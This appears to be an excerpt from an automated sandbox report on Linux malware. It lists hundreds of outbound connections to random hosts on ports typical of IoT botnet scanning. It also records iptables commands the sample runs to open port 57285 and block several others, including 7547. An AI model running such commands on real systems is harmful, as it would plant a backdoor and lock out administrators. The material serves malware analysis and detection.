                            Source: global trafficTCP traffic: 192.168.2.23:37724 -> 220.235.116.138:37215
                            Source: global trafficTCP traffic: 192.168.2.23:42786 -> 107.246.211.6:8080
                            Source: global trafficTCP traffic: 192.168.2.23:34628 -> 64.202.42.164:8443
                            Source: global trafficTCP traffic: 192.168.2.23:39656 -> 117.61.176.64:81
                            Source: global trafficTCP traffic: 192.168.2.23:38284 -> 203.108.157.203:49152
                            Source: global trafficTCP traffic: 192.168.2.23:54284 -> 97.116.126.171:7574
                            Source: global trafficTCP traffic: 192.168.2.23:44394 -> 152.145.133.63:7574
                            Source: global trafficTCP traffic: 192.168.2.23:44554 -> 215.109.47.160:8080
                            Source: global trafficTCP traffic: 192.168.2.23:44166 -> 198.219.16.2:37215
                            Source: global trafficTCP traffic: 192.168.2.23:46206 -> 16.59.3.235:8080
                            Source: global trafficTCP traffic: 192.168.2.23:50630 -> 205.138.223.89:5555
                            Source: global trafficTCP traffic: 192.168.2.23:42854 -> 158.70.45.62:37215
                            Source: global trafficTCP traffic: 192.168.2.23:49770 -> 178.81.166.199:5555
                            Source: global trafficTCP traffic: 192.168.2.23:53618 -> 9.27.194.149:8080
                            Source: global trafficTCP traffic: 192.168.2.23:50148 -> 156.103.65.244:8443
                            Source: global trafficTCP traffic: 192.168.2.23:37394 -> 60.38.64.161:8080
                            Source: global trafficTCP traffic: 192.168.2.23:53612 -> 56.49.113.237:8443
                            Source: global trafficTCP traffic: 192.168.2.23:45848 -> 131.57.28.181:8080
                            Source: global trafficTCP traffic: 192.168.2.23:51552 -> 57.213.32.146:8080
                            Source: global trafficTCP traffic: 192.168.2.23:57450 -> 54.244.27.191:8443
                            Source: global trafficTCP traffic: 192.168.2.23:44056 -> 221.66.59.135:7574
                            Source: global trafficTCP traffic: 192.168.2.23:60002 -> 182.36.59.216:8443
                            Source: global trafficTCP traffic: 192.168.2.23:53354 -> 189.249.191.153:8443
                            Source: global trafficTCP traffic: 192.168.2.23:60232 -> 54.127.242.69:8080
                            Source: global trafficTCP traffic: 192.168.2.23:48974 -> 170.18.225.85:81
                            Source: global trafficTCP traffic: 192.168.2.23:33612 -> 193.104.58.153:8080
                            Source: global trafficTCP traffic: 192.168.2.23:41324 -> 142.172.142.87:49152
                            Source: global trafficTCP traffic: 192.168.2.23:54778 -> 171.79.99.1:8080
                            Source: global trafficTCP traffic: 192.168.2.23:52684 -> 144.141.113.17:37215
                            Source: global trafficTCP traffic: 192.168.2.23:42400 -> 102.193.207.146:8080
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 24.182.99.32:1023
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 149.189.137.118:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 12.64.101.250:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 176.2.237.115:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 118.88.159.199:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 153.128.236.153:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 82.181.172.117:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 166.95.100.85:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 2.216.2.46:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 38.244.192.242:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 159.207.88.183:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 160.126.89.203:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 78.219.117.109:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 114.175.171.99:1023
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 171.47.100.141:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 163.229.222.4:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 62.11.154.101:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 58.129.107.25:1023
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 42.139.58.17:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 196.168.121.108:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 82.232.155.170:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 86.172.241.246:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 125.198.42.83:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 81.124.156.165:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 70.89.111.87:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 57.100.77.3:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 111.27.122.216:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 77.242.8.19:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 197.163.58.111:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 163.86.26.48:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 45.33.204.83:1023
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 206.238.125.93:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 20.57.118.34:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 74.42.176.98:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 169.120.89.85:1023
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 112.22.251.90:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 166.32.174.23:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 191.69.123.54:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 120.170.234.28:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 63.44.228.81:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 202.251.45.71:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 118.28.2.23:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 39.183.82.2:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 147.22.1.138:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 180.81.190.232:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 113.90.151.1:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 108.169.50.33:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 191.239.55.74:1023
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 99.225.90.230:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 188.45.197.202:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 99.121.117.193:2323
                            Source: global trafficTCP traffic: 192.168.2.23:35616 -> 60.143.194.215:81
                            Source: global trafficTCP traffic: 192.168.2.23:45496 -> 209.173.57.59:7574
                            Source: global trafficTCP traffic: 192.168.2.23:51038 -> 60.188.153.211:81
                            Source: global trafficTCP traffic: 192.168.2.23:53778 -> 141.244.188.12:49152
                            Source: global trafficTCP traffic: 192.168.2.23:35860 -> 187.38.172.214:8080
                            Source: global trafficTCP traffic: 192.168.2.23:54604 -> 95.159.40.251:7574
                            Source: global trafficTCP traffic: 192.168.2.23:60844 -> 53.174.185.180:5555
                            Source: global trafficTCP traffic: 192.168.2.23:49448 -> 31.112.217.42:8080
                            Source: global trafficTCP traffic: 192.168.2.23:42354 -> 9.56.220.231:49152
                            Source: global trafficTCP traffic: 192.168.2.23:40806 -> 110.44.0.102:5555
                            Source: global trafficTCP traffic: 192.168.2.23:49594 -> 155.174.193.236:8080
                            Source: global trafficTCP traffic: 192.168.2.23:35144 -> 90.72.116.28:7574
                            Source: global trafficTCP traffic: 192.168.2.23:40192 -> 146.25.213.174:49152
                            Source: global trafficTCP traffic: 192.168.2.23:44986 -> 191.45.226.73:8080
                            Source: global trafficTCP traffic: 192.168.2.23:54634 -> 155.64.195.25:7574
                            Source: global trafficTCP traffic: 192.168.2.23:39868 -> 209.78.212.21:8080
                            Source: global trafficTCP traffic: 192.168.2.23:49858 -> 21.235.51.57:8443
                            Source: global trafficTCP traffic: 192.168.2.23:35108 -> 38.7.77.71:52869
                            Source: global trafficTCP traffic: 192.168.2.23:38556 -> 17.105.162.35:8080
                            Source: global trafficTCP traffic: 192.168.2.23:46152 -> 195.214.23.156:52869
                            Source: global trafficTCP traffic: 192.168.2.23:52986 -> 139.246.211.115:37215
                            Source: global trafficTCP traffic: 192.168.2.23:52390 -> 201.188.175.229:7574
                            Source: global trafficTCP traffic: 192.168.2.23:60010 -> 173.66.249.230:7574
                            Source: global trafficTCP traffic: 192.168.2.23:48438 -> 219.40.5.162:8443
                            Source: global trafficTCP traffic: 192.168.2.23:41060 -> 105.175.75.134:5555
                            Source: global trafficTCP traffic: 192.168.2.23:50664 -> 203.211.100.123:37215
                            Source: global trafficTCP traffic: 192.168.2.23:56158 -> 166.105.236.182:7574
                            Source: global trafficTCP traffic: 192.168.2.23:34918 -> 25.125.5.55:49152
                            Source: global trafficTCP traffic: 192.168.2.23:37456 -> 16.50.79.183:8080
                            Source: global trafficTCP traffic: 192.168.2.23:32944 -> 111.4.180.69:37215
                            Source: global trafficTCP traffic: 192.168.2.23:55158 -> 83.172.215.118:5555
                            Source: global trafficTCP traffic: 192.168.2.23:58314 -> 217.15.207.28:37215
                            Source: global trafficTCP traffic: 192.168.2.23:42610 -> 39.103.251.253:8080
                            Source: global trafficTCP traffic: 192.168.2.23:50116 -> 80.12.206.237:7574
                            Source: global trafficTCP traffic: 192.168.2.23:51316 -> 215.40.71.26:8080
                            Source: global trafficTCP traffic: 192.168.2.23:55336 -> 130.67.243.6:8080
                            Source: global trafficTCP traffic: 192.168.2.23:60376 -> 79.254.93.26:49152
                            Source: global trafficTCP traffic: 192.168.2.23:39998 -> 180.113.188.93:37215
                            Source: global trafficTCP traffic: 192.168.2.23:45890 -> 14.9.58.164:81
                            Source: global trafficTCP traffic: 192.168.2.23:34878 -> 66.197.17.76:37215
                            Source: global trafficTCP traffic: 192.168.2.23:42772 -> 205.44.42.187:8443
                            Source: global trafficTCP traffic: 192.168.2.23:35580 -> 47.234.28.192:5555
                            Source: global trafficTCP traffic: 192.168.2.23:59088 -> 54.66.222.161:8080
                            Source: global trafficTCP traffic: 192.168.2.23:51652 -> 139.235.204.155:81
                            Source: global trafficTCP traffic: 192.168.2.23:60476 -> 95.106.196.76:81
                            Source: global trafficTCP traffic: 192.168.2.23:44298 -> 68.239.15.161:8080
                            Source: global trafficTCP traffic: 192.168.2.23:39566 -> 197.48.190.105:37215
                            Source: global trafficTCP traffic: 192.168.2.23:46480 -> 100.215.73.157:37215
                            Source: global trafficTCP traffic: 192.168.2.23:39552 -> 84.5.28.114:7574
                            Source: global trafficTCP traffic: 192.168.2.23:52416 -> 167.242.62.228:37215
                            Source: global trafficTCP traffic: 192.168.2.23:39918 -> 86.204.100.185:8080
                            Source: global trafficTCP traffic: 192.168.2.23:51036 -> 218.143.100.6:8443
                            Source: global trafficTCP traffic: 192.168.2.23:47010 -> 128.160.247.151:49152
                            Source: global trafficTCP traffic: 192.168.2.23:38028 -> 196.204.108.175:37215
                            Source: global trafficTCP traffic: 192.168.2.23:57650 -> 156.166.198.160:8080
                            Source: global trafficTCP traffic: 192.168.2.23:51176 -> 199.201.191.100:49152
                            Source: global trafficTCP traffic: 192.168.2.23:45924 -> 76.168.52.7:8443
                            Source: global trafficTCP traffic: 192.168.2.23:51858 -> 154.99.164.58:8080
                            Source: global trafficTCP traffic: 192.168.2.23:35580 -> 68.79.128.122:7574
                            Source: global trafficTCP traffic: 192.168.2.23:32862 -> 218.240.42.107:8080
                            Source: global trafficTCP traffic: 192.168.2.23:36814 -> 100.12.64.164:49152
                            Source: global trafficTCP traffic: 192.168.2.23:43140 -> 97.121.163.0:7574
                            Source: global trafficTCP traffic: 192.168.2.23:57598 -> 75.158.5.139:8080
                            Source: global trafficTCP traffic: 192.168.2.23:41862 -> 92.102.182.53:8443
                            Source: global trafficTCP traffic: 192.168.2.23:51534 -> 18.236.8.199:7574
                            Source: global trafficTCP traffic: 192.168.2.23:32962 -> 125.125.201.185:37215
                            Source: global trafficTCP traffic: 192.168.2.23:59094 -> 171.177.75.220:37215
                            Source: global trafficTCP traffic: 192.168.2.23:57848 -> 65.63.150.189:81
                            Source: global trafficTCP traffic: 192.168.2.23:48938 -> 177.110.37.31:8443
                            Source: global trafficTCP traffic: 192.168.2.23:35750 -> 125.87.27.123:8443
                            Source: global trafficTCP traffic: 192.168.2.23:41766 -> 48.128.115.213:49152
                            Source: global trafficTCP traffic: 192.168.2.23:38332 -> 109.227.125.29:37215
                            Source: global trafficTCP traffic: 192.168.2.23:52944 -> 41.90.240.235:8080
                            Source: global trafficTCP traffic: 192.168.2.23:55162 -> 15.113.25.131:7574
                            Source: global trafficTCP traffic: 192.168.2.23:47578 -> 146.120.170.183:8080
                            Source: global trafficTCP traffic: 192.168.2.23:56390 -> 146.211.235.115:8080
                            Source: global trafficTCP traffic: 192.168.2.23:44994 -> 77.47.103.213:5555
                            Source: global trafficTCP traffic: 192.168.2.23:39666 -> 18.64.144.254:8080
                            Source: global trafficTCP traffic: 192.168.2.23:45914 -> 99.57.40.174:8080
                            Source: global trafficTCP traffic: 192.168.2.23:47782 -> 147.137.69.26:8080
                            Source: global trafficTCP traffic: 192.168.2.23:41838 -> 75.73.193.172:81
                            Source: global trafficTCP traffic: 192.168.2.23:41154 -> 65.39.111.4:81
                            Source: global trafficTCP traffic: 192.168.2.23:41548 -> 66.141.72.196:7574
                            Source: global trafficTCP traffic: 192.168.2.23:55898 -> 19.97.225.232:8080
                            Source: global trafficTCP traffic: 192.168.2.23:49106 -> 190.16.155.107:5555
                            Source: global trafficTCP traffic: 192.168.2.23:59078 -> 186.82.144.25:8080
                            Source: global trafficTCP traffic: 192.168.2.23:52396 -> 30.42.12.145:8080
                            Source: global trafficTCP traffic: 192.168.2.23:33322 -> 152.225.48.236:5555
                            Source: global trafficTCP traffic: 192.168.2.23:54972 -> 58.37.190.45:37215
                            Source: global trafficTCP traffic: 192.168.2.23:46566 -> 110.53.18.20:5555
                            Source: global trafficTCP traffic: 192.168.2.23:35736 -> 81.191.165.190:8080
                            Source: global trafficTCP traffic: 192.168.2.23:51756 -> 79.35.50.92:37215
                            Source: global trafficTCP traffic: 192.168.2.23:53140 -> 94.210.13.65:7574
                            Source: global trafficTCP traffic: 192.168.2.23:44560 -> 157.237.189.119:52869
                            Source: global trafficTCP traffic: 192.168.2.23:35620 -> 55.93.57.66:81
                            Source: global trafficTCP traffic: 192.168.2.23:54308 -> 148.242.155.231:8443
                            Source: global trafficTCP traffic: 192.168.2.23:40358 -> 14.233.171.125:81
                            Source: global trafficTCP traffic: 192.168.2.23:37510 -> 159.175.193.207:52869
                            Source: global trafficTCP traffic: 192.168.2.23:51774 -> 39.214.1.140:8080
                            Source: global trafficTCP traffic: 192.168.2.23:43296 -> 221.219.229.131:49152
                            Source: global trafficTCP traffic: 192.168.2.23:33188 -> 211.75.126.69:49152
                            Source: global trafficTCP traffic: 192.168.2.23:49390 -> 44.237.251.105:52869
                            Source: global trafficTCP traffic: 192.168.2.23:39368 -> 112.98.241.193:81
                            Source: global trafficTCP traffic: 192.168.2.23:45414 -> 26.113.196.89:8443
                            Source: global trafficTCP traffic: 192.168.2.23:48186 -> 189.242.111.9:8080
                            Source: global trafficTCP traffic: 192.168.2.23:34304 -> 108.83.126.248:8443
                            Source: global trafficTCP traffic: 192.168.2.23:60006 -> 161.25.219.1:81
                            Source: global trafficTCP traffic: 192.168.2.23:49412 -> 84.51.179.123:37215
                            Source: global trafficTCP traffic: 192.168.2.23:56276 -> 58.13.152.91:8080
                            Source: global trafficTCP traffic: 192.168.2.23:59518 -> 64.105.173.62:8080
                            Source: global trafficTCP traffic: 192.168.2.23:34448 -> 108.32.60.179:8080
                            Source: global trafficTCP traffic: 192.168.2.23:47976 -> 179.84.124.199:8080
                            Source: global trafficTCP traffic: 192.168.2.23:36202 -> 151.33.64.10:7574
                            Source: global trafficTCP traffic: 192.168.2.23:53644 -> 144.95.201.80:37215
                            Source: global trafficTCP traffic: 192.168.2.23:39746 -> 51.35.206.13:81
                            Source: global trafficTCP traffic: 192.168.2.23:51220 -> 3.178.63.133:8080
                            Source: global trafficTCP traffic: 192.168.2.23:43582 -> 86.214.31.28:37215
                            Source: global trafficTCP traffic: 192.168.2.23:60674 -> 220.112.244.93:52869
                            Source: global trafficTCP traffic: 192.168.2.23:50310 -> 119.24.183.33:8080
                            Source: global trafficTCP traffic: 192.168.2.23:55736 -> 164.49.37.152:52869
                            Source: global trafficTCP traffic: 192.168.2.23:45748 -> 75.221.225.250:49152
                            Source: global trafficTCP traffic: 192.168.2.23:58586 -> 65.22.127.93:7574
                            Source: global trafficTCP traffic: 192.168.2.23:52552 -> 122.78.77.224:8080
                            Source: global trafficTCP traffic: 192.168.2.23:43462 -> 142.149.121.92:5555
                            Source: global trafficTCP traffic: 192.168.2.23:33110 -> 159.70.154.187:81
                            Source: global trafficTCP traffic: 192.168.2.23:49440 -> 129.125.220.2:8080
                            Source: global trafficTCP traffic: 192.168.2.23:50770 -> 9.15.166.129:52869
                            Source: global trafficTCP traffic: 192.168.2.23:47508 -> 46.89.254.44:37215
                            Source: global trafficTCP traffic: 192.168.2.23:50712 -> 82.222.192.8:49152
                            Source: global trafficTCP traffic: 192.168.2.23:36988 -> 68.81.189.11:5555
                            Source: global trafficTCP traffic: 192.168.2.23:54156 -> 36.44.154.230:7574
                            Source: global trafficTCP traffic: 192.168.2.23:53132 -> 175.176.33.31:49152
                            Source: global trafficTCP traffic: 192.168.2.23:49046 -> 75.202.127.58:49152
                            Source: global trafficTCP traffic: 192.168.2.23:56752 -> 104.195.139.112:81
                            Source: global trafficTCP traffic: 192.168.2.23:38508 -> 58.88.196.167:7574
                            Source: global trafficTCP traffic: 192.168.2.23:44882 -> 188.183.162.90:81
                            Source: global trafficTCP traffic: 192.168.2.23:45316 -> 187.38.102.206:49152
                            Source: global trafficTCP traffic: 192.168.2.23:55040 -> 217.112.237.238:52869
                            Source: global trafficTCP traffic: 192.168.2.23:52620 -> 183.189.6.116:8080
                            Source: global trafficTCP traffic: 192.168.2.23:46662 -> 134.87.142.186:37215
                            Source: global trafficTCP traffic: 192.168.2.23:43836 -> 202.217.55.59:81
                            Source: global trafficTCP traffic: 192.168.2.23:47488 -> 129.113.117.201:7574
                            Source: global trafficTCP traffic: 192.168.2.23:55338 -> 190.22.11.98:37215
                            Source: global trafficTCP traffic: 192.168.2.23:60964 -> 174.128.23.126:8080
                            Source: global trafficTCP traffic: 192.168.2.23:57684 -> 82.116.130.80:5555
                            Source: global trafficTCP traffic: 192.168.2.23:47342 -> 209.214.96.254:7574
                            Source: global trafficTCP traffic: 192.168.2.23:60802 -> 52.98.15.150:8443
                            Source: global trafficTCP traffic: 192.168.2.23:59396 -> 148.252.76.108:7574
                            Source: global trafficTCP traffic: 192.168.2.23:37650 -> 114.179.2.31:8080
                            Source: global trafficTCP traffic: 192.168.2.23:49346 -> 87.170.218.169:37215
                            Source: global trafficTCP traffic: 192.168.2.23:48352 -> 61.77.120.5:37215
                            Source: global trafficTCP traffic: 192.168.2.23:39610 -> 105.99.123.173:8080
                            Source: global trafficTCP traffic: 192.168.2.23:42380 -> 133.76.88.160:81
                            Source: global trafficTCP traffic: 192.168.2.23:48266 -> 125.76.215.12:8080
                            Source: global trafficTCP traffic: 192.168.2.23:55076 -> 65.55.17.33:8080
                            Source: global trafficTCP traffic: 192.168.2.23:52160 -> 93.175.168.155:8080
                            Source: global trafficTCP traffic: 192.168.2.23:54502 -> 44.20.228.122:81
                            Source: global trafficTCP traffic: 192.168.2.23:42546 -> 110.87.214.87:52869
                            Source: global trafficTCP traffic: 192.168.2.23:59666 -> 149.6.178.166:8080
                            Source: global trafficTCP traffic: 192.168.2.23:36150 -> 45.190.28.68:81
                            Source: global trafficTCP traffic: 192.168.2.23:53268 -> 212.67.65.96:8080
                            Source: global trafficTCP traffic: 192.168.2.23:42708 -> 110.69.45.221:52869
                            Source: global trafficTCP traffic: 192.168.2.23:34816 -> 143.125.99.60:8080
                            Source: global trafficTCP traffic: 192.168.2.23:51846 -> 166.252.165.142:8080
                            Source: global trafficTCP traffic: 192.168.2.23:60934 -> 49.174.147.72:52869
                            Source: global trafficTCP traffic: 192.168.2.23:44144 -> 219.124.46.204:81
                            Source: global trafficTCP traffic: 192.168.2.23:59526 -> 112.149.230.147:7574
                            Source: global trafficTCP traffic: 192.168.2.23:33998 -> 118.181.71.158:49152
                            Source: global trafficTCP traffic: 192.168.2.23:58790 -> 155.231.143.202:37215
                            Source: global trafficTCP traffic: 192.168.2.23:37714 -> 63.200.102.171:7574
                            Source: global trafficTCP traffic: 192.168.2.23:49396 -> 103.249.111.10:7574
                            Source: global trafficTCP traffic: 192.168.2.23:60546 -> 82.181.62.90:8443
                            Source: global trafficTCP traffic: 192.168.2.23:41122 -> 119.130.151.44:81
                            Source: global trafficTCP traffic: 192.168.2.23:38514 -> 122.52.227.5:49152
                            Source: global trafficTCP traffic: 192.168.2.23:60574 -> 134.158.228.133:8080
                            Source: global trafficTCP traffic: 192.168.2.23:34022 -> 118.218.173.230:81
                            Source: global trafficTCP traffic: 192.168.2.23:56744 -> 143.251.2.198:52869
                            Source: global trafficTCP traffic: 192.168.2.23:59388 -> 92.61.151.177:52869
                            Source: global trafficTCP traffic: 192.168.2.23:50578 -> 165.41.62.143:81
                            Source: global trafficTCP traffic: 192.168.2.23:59942 -> 134.101.144.103:52869
                            Source: global trafficTCP traffic: 192.168.2.23:33796 -> 125.175.146.183:8443
                            Source: global trafficTCP traffic: 192.168.2.23:55994 -> 44.79.80.80:7574
                            Source: global trafficTCP traffic: 192.168.2.23:44686 -> 126.30.37.34:49152
                            Source: global trafficTCP traffic: 192.168.2.23:60346 -> 183.76.200.130:8443
                            Source: global trafficTCP traffic: 192.168.2.23:42588 -> 150.149.68.200:8080
                            Source: global trafficTCP traffic: 192.168.2.23:40850 -> 54.52.193.242:37215
                            Source: global trafficTCP traffic: 192.168.2.23:44352 -> 68.164.136.214:8080
                            Source: global trafficTCP traffic: 192.168.2.23:49792 -> 36.30.167.44:8080
                            Source: global trafficTCP traffic: 192.168.2.23:48530 -> 121.133.146.20:8080
                            Source: global trafficTCP traffic: 192.168.2.23:49260 -> 171.64.132.184:8080
                            Source: global trafficTCP traffic: 192.168.2.23:46068 -> 137.232.182.11:37215
                            Source: global trafficTCP traffic: 192.168.2.23:35292 -> 216.225.199.77:7574
                            Source: global trafficTCP traffic: 192.168.2.23:58286 -> 184.63.218.127:49152
                            Source: global trafficTCP traffic: 192.168.2.23:39496 -> 171.182.33.216:81
                            Source: global trafficTCP traffic: 192.168.2.23:34854 -> 176.190.233.75:8080
                            Source: global trafficTCP traffic: 192.168.2.23:45210 -> 203.193.218.4:37215
                            Source: global trafficTCP traffic: 192.168.2.23:52046 -> 197.18.25.237:5555
                            Source: global trafficTCP traffic: 192.168.2.23:37048 -> 58.181.145.4:49152
                            Source: global trafficTCP traffic: 192.168.2.23:33060 -> 45.122.179.192:7574
                            Source: global trafficTCP traffic: 192.168.2.23:39176 -> 8.153.189.211:8080
                            Source: global trafficTCP traffic: 192.168.2.23:45990 -> 155.221.85.240:8443
                            Source: global trafficTCP traffic: 192.168.2.23:40128 -> 102.244.106.84:8080
                            Source: global trafficTCP traffic: 192.168.2.23:39538 -> 69.153.25.131:37215
                            Source: global trafficTCP traffic: 192.168.2.23:55058 -> 156.94.30.236:52869
                            Source: global trafficTCP traffic: 192.168.2.23:46208 -> 98.140.243.164:8080
                            Source: global trafficTCP traffic: 192.168.2.23:43144 -> 61.177.7.93:52869
                            Source: global trafficTCP traffic: 192.168.2.23:49900 -> 158.11.245.225:5555
                            Source: global trafficTCP traffic: 192.168.2.23:57418 -> 49.204.76.212:8443
                            Source: global trafficTCP traffic: 192.168.2.23:52130 -> 71.53.95.73:8080
                            Source: global trafficTCP traffic: 192.168.2.23:47524 -> 6.220.203.209:8080
                            Source: global trafficTCP traffic: 192.168.2.23:43152 -> 143.239.151.194:8080
                            Source: global trafficTCP traffic: 192.168.2.23:36874 -> 185.73.28.219:8443
                            Source: global trafficTCP traffic: 192.168.2.23:53824 -> 196.189.11.187:8080
                            Source: global trafficTCP traffic: 192.168.2.23:47150 -> 221.33.31.177:8080
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 196.8.207.235:1023
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 9.129.230.123:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 47.45.192.224:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 167.239.231.71:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 75.147.119.165:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 158.114.229.145:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 173.77.60.40:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 194.187.25.238:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 160.25.42.7:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 162.48.3.197:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 91.32.247.35:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 46.135.186.127:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 160.236.127.94:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 193.229.99.172:1023
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 161.187.15.105:2323
                            Source: global trafficTCP traffic: 192.168.2.23:51834 -> 17.26.14.5:2323
                            Source: global trafficTCP traffic: 192.168.2.23:59770 -> 87.28.80.213:8080
                            Source: /bin/sh (PID: 6275)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6282)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6285)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6290)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6293)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6296)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6299)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6302)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6328)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6331)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6334)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6337)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6344)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6347)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6350)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6353)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6356)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6359)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6366)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6369)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6377)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6380)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6387)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6393)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6401)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p udp --destination-port 60815 -j ACCEPTJump to behavior
